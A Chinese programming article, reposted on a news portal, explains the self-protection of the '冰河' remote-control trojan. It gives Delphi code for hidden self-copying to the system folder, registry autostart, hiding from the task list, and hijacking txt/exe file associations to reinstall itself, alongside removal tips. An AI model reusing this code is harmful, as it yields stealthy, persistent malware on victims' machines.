分享
 
 
 

“冰河”启示录

王朝delphi·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

冰河”启示录

陈经

前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)本人对"冰河"及其作者没有任何不满,相反,作者肯帮助初学者的态度是我们每一个人都应该学习的.(二)本文的目的在于交流编程经验,没有任何其它不良企图.(三)在一些领域,我们理应宁可自制力让我们的预见力保持寂寞,也不要去做一个打开潘多拉盒子的先知。所以一些更厉害的方法我们现在不会提,以后也不会.--2000.8.3

(1)

“冰河”是有名的用C++Builder编写的国产远程管理软件,其自我的功能保护很强,下面就以Delphi为例谈一谈它的原理,希望对大家有一些启发.

一、程序安装

此类程序一般会把自己隐藏起来运行,通常不外乎以下几种方法:自我拷贝法、资源文件法、网页方式安装、类病毒捆绑法(如YAI).自我拷贝法适用于本身就一个文件,资源文件法可以同时安装好几个文件,网页方式安装要先向M$交钱换安全签证,类病毒捆绑法利用了病毒的原理.本文只介绍自我拷贝法,其它方法请到我的个人主页去看.http://lovejingtao.126.com

1:自我拷贝法

这种方法的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,再退出旧程序.

打开Delphi,新建一个工程,在窗口的Create事件中写代码:

procedure TForm1.FormCreate(Sender: TObject);

var myname: string;

begin

myname := ExtractFilename(Application.Exename); //获得文件名

if application.Exename <> GetWindir + myname then //如果文件不是在Windows\System\那么..

begin

copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{将自己拷贝到Windows\System\下}

Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows\System\下的新文件

application.Terminate;//退出

end;

end;

其中GetWinDir是自定义函数,起功能是找出Windows\System\的路径.

function GetWinDir: String;

var

Buf: array[0..MAX_PATH] of char;

begin

GetSystemDirectory(Buf, MAX_PATH);

Result := Buf;

if Result[Length(Result)]<>'\' then Result := Result + '\';

end;

另外,为了避免同时运行多个程序的副本(节约系统资源也),程序一般会弄成每次只能运行一个.这又有几种方法.

一种方法是程序运行时先查找有没有相同的运行了,如果有,就立刻退出程序.

修改dpr项目文件,修改begin和end之间的代码如下:

begin

Application.Initialize;

if FindWindow('TForm1','Form1')=0 then begin

//当没有找到Form1时执行下面代码

Application.ShowMainForm:=False; //不显示主窗口

Application.CreateForm(TForm1, Form1);

Application.Run;

end;

end.

另一种方法是启动时会先通过窗口名来确定是否已经在运行,如果是则关闭原先的再启动。“冰河”就是用这种方法的。

这样做的好处在于方便升级.它会自动用新版本覆盖旧版本.

方法如下:修改dpr项目文件

uses

Forms,windows,messages,

Unit1 in 'Unit1.pas' {Form1};

为了程序能在Windows每次启动时自动运行,可以通过六种途径来实现.“冰河”用注册表的方式。

加入Registry单元,改写上面的窗口Create事件,改写后的程序如下:

procedure TForm1.FormCreate(Sender: TObject);

const K = '\Software\Microsoft\Windows\CurrentVersion\RunServices';

var myname: string;

begin

{Write by Lovejingtao,http://Lovejingtao.126.com,Lovejingtao@21cn.com}

myname := ExtractFilename(Application.Exename); //获得文件名

if application.Exename <> GetWindir + myname then //如果文件不是在Windows\System\那么..

begin

copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{//将自己拷贝到Windows\System\下}

Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows\System\下的新文件

application.Terminate;//退出

end;

with TRegistry.Create do

try

RootKey := HKEY_LOCAL_MACHINE;

OpenKey( K, TRUE );

WriteString( 'syspler', application.ExeName );

finally

free;

end;

end;

为了让程序用ALT+DEL+CTRL看不见,在implementation后添加声明:

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL';

再在上面的窗口Create事件加上一句:RegisterServiceProcess(GetCurrentProcessID, 1);//隐藏

启示1:当我们中了“冰河”,如果被对方上了密码而无法自己卸载时,可以先找出是什么文件,然后自己配置一个没有密码的来运行,这样它就会把原来有密码的覆盖掉,自己就可以轻松用它的卸载功能把它卸掉.如果你会编程,也可以自己写一个"清除器"了,方法是先查找到窗口名,向它发送退出命令,再把它删除即可.

(2)

“冰河”的自我功能保护很强,它一般通过Txt或Exe文件关联来达到自我恢复.所以有很多人明明把它杀掉了,但重新启动时又会出现.下面举以Txt文件关联为例.

打开Delphi,新建一个工程,在窗口的Create事件中写代码:

uses Registry

procedure TForm1.FormCreate(Sender: TObject);

const Kkk = '\Software\Microsoft\Windows\CurrentVersion\RunServices';

const K = '\txtfile\shell\open\command';

var sFileName:string;

begin

//******************************************************

with TRegistry.Create do //写注册表,让程序跟文本文件关联

try

RootKey := HKEY_CLASSES_ROOT;

OpenKey( K, TRUE );

{Write by Lovejingtao,http://lovejingtao.126.com}

WriteString( '', application.ExeName+' "%1" ');

{Write by Lovejingtao,lovejingtao@21cn.com}

finally

free;

end;

//*******************************************************

with TRegistry.Create do //写注册表,每次启动时自动运行

try

RootKey := HKEY_LOCAL_MACHINE;

OpenKey( Kkk, TRUE );

WriteString( 'myTray', application.ExeName );

finally

free;

end;

//********************************************************

if FileExists(pchar(Getwindir+'Sysplay.exe'))=false then//如果文件已经删除

begin

copyfile;//自定义拷贝资源文件过程

winexec(pchar(Getwindir+'Sysplay.exe'),sw_hide);

end;

//**********************************************************

if ParamCount>0 then begin (* 有执行参数传入 *)

sFileName:=ParamStr(1); (* 取得参数内容 *)

winexec(pchar('Notepad.exe '+sFileName),sw_show);(*用记事本打开*)

//winexec(pchar( sFileName),sw_show);

end;

//*******************************************************

application.Terminate;//退出

end;

如果要改为与Exe文件关联,只要把"const K = '\txtfile\shell\open\command';"改为

"const K = '\exefile\shell\open\command';",把"winexec(pchar('Notepad.exe '+sFileName),sw_show);"

改为"winexec(pchar( sFileName),sw_show);"即可.当然,还要加入是否退出Windows而运行的Rundll32.dll,

否则会因为关联Exe文件而退不出Windows.

启示2:手工删除“冰河”时,还要改掉它的保护功能,不能让它恢复.如果是关联了文本文件,先改注册表让它不能自动运行,重启后不要打开文本文件,立刻进到其安装目录把它删除.如果是关联了Exe文件,那只有回到Dos下删.切记:一定要把两个文件同时删掉,否则你重启后会发现文件又恢复了.

★作者:

陈经韬

Http:Lovejingtao.126.com

E-Mail: Lovejingtao@21.cn.com

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有